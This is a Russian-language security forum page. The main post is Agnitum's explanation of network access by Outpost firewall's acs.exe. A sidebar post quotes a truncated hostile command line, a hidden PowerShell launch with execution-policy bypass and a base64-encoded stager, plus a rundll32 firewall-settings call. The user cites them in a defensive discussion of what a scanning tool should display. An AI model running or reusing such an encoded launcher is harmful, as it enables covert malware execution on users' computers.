Перейти к содержанию
Dmitriy K

Ограничения доступа в сеть acs.exe

Recommended Posts

Dmitriy K

Некоторые пользователи Outpost удивились, что доступ в сеть acs.exe не всегда ограничивается системными правилами. Публикуем разъяснение Agnitum:

Для корректной работы и полноценной защиты (включая, в частности, получение обновлений и регистрацию продукта) программе Outpost требуется доступ к сайту agnitum.com. Мы предоставили право такого доступа одному из исполняемых файлов Outpost (acs.exe). Мы видим в этом необходимую меру для обеспечения безопасности пользовательского ПК. Как было замечено, разрешающее правило для acs.exe вызвало нарекания среди некоторых наших пользователей, которые хотели бы иметь возможность заблокировать такую активность. На следующей неделе команда Agnitum планирует выпустить обновление, которое позволит осуществить такую блокировку. Однако мы хотим еще раз напомнить о том, что доступ к сайту для acs.exe необходим для полноценной работы Outpost, и в случае блокировки доступа мы не можем гарантировать безукоризненное поведение продукта, полную безопасность ПК и поддержку в решении связанных с данным случаем проблем.
Отредактировал Виталий Я.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×